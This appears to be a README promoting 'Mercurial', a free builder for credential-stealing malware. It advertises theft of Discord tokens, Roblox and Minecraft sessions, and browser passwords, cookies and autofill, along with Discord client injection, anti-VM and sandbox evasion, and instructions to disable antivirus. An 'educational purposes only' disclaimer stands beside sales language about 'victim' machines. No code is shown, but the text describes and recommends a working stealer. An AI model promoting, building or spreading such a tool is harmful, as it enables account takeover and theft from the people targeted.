Patch Notes:
First stable release.
Working as of 2/4/2023
Due to constant Discord terminations I will not be making a new support server. For urgent contact: iwannaeatahamster#2208
Mercurial Preview
Features What is Mercurial?
Mercurial is the best FREE logger you can get currently, don't fall for other scams. Mercurial works as of 2/4/2023.
Features
- Grabs Roblox cookies from Roblox Studio
- Grabs Minecraft sessions
- Sends Minecraft logins
- Grabs Discord token info
- Nitro
- Badges
- Billing
- Phone
- HQ Guilds
- HQ Friends
- Gift codes
- Grabs Brower Data
- Cookies
- Passwords
- History
- Bookmarks
- Autofill
- Chrome, Edge, Brave, Opera GX, and many more...
- Grabs victim machine info
- User
- System
- Disk
- Network
- WiFi
- Screenshot
- Grabs Windows product key
- Sends Windows Product Key to active Windows
- Grabs IP address, geolocation
- Grabs screenshot
- Anti Virutal Machine
- Anti Debug
- Checks if being run in a virustotal sandbox
- Discord injection
- Send token, password, and email on login or when password is changed
Customization
- Add a custom icon
- Custom exe name
- Toggle RGB
- Change Transparency
Info
Please do not use the program maliciously. This program is intended to be used for educational purposes only. Mercurial is only used to demonstrate what type of information attackers can grab from a user's computer. This is a project was created to make it easier for malware analysts or ordinary users to understand how credential grabbing works and can be used for analysis, research, reverse engineering, or review.
What is malware?
- Malware is a term that is used for malicious software that is designed to do damage or unwanted actions to a computer system.
An explanation of this tool:
Google Chrome always store user data in the same place, so the stealer generated by Mercurial Grabber has no problem in finding it. In theory at least, this data is stored in encrypted form. However, if the malware has already penetrated the system, then its actions are done in your name.
Therefore, the malware simply finds a way to decrypt information stored on your computer (by making it seem like thie user is requesting it) . The stealer gets all your passwords and cookies.
The tool is also able to find Roblox cookies that are stored in the Windows Registry. By running the malicious .exe file, it is able to search for the Roblox cookie. The same goes for Minecraft sessions, Discord tokens, etc since it is stored in the user's computer.
Recommended tools for testing Mercurial:
(when running the produced output after building)
- Virtualbox
- VMware
- Process Hacker
- VirusTotal
Tips to check if an exe file is safe:
- Analyze the file with VirusTotal
- Check if the exe file has a publisher
- Check it in a sandbox
- Monitor the file’s network activity for strange behavior
Why do you need your anti-virus off for Mercurial?
- Mercurial requires you to turn your virus off due to Mercurial having the ability to produce malicious codes.
Educational Purposes Only
This tool demonstrates and makes it easy to create your own grabber. This shows what type of information attackers can grab from a victim's computer.
Only use this on your own PC and do not use it on other people maliciously.
License
Mercurial is licensed under the MIT License.
Errors?
-
Make an issue
-
Message me on Discord
- iwannaeatahamster#2208
Known Errors
Operation did not complete succesfully because the file contains a virus or potentially unwanted software.
- This happens because due to Mercurial having the ability to create malicious files, its flagged as a virus.
Fix:
- Disable Anti-virus
The item 'Mercurial.exe' that this shortcut refers to has been changed or moved, so this shortcut will no longer work properly
- This happens because due to Mercurial having the ability to create malicious files, your anti-virus will flag it as a virus, and automatically delete it.
Fix:
- Disable Anti-Virus, then re-download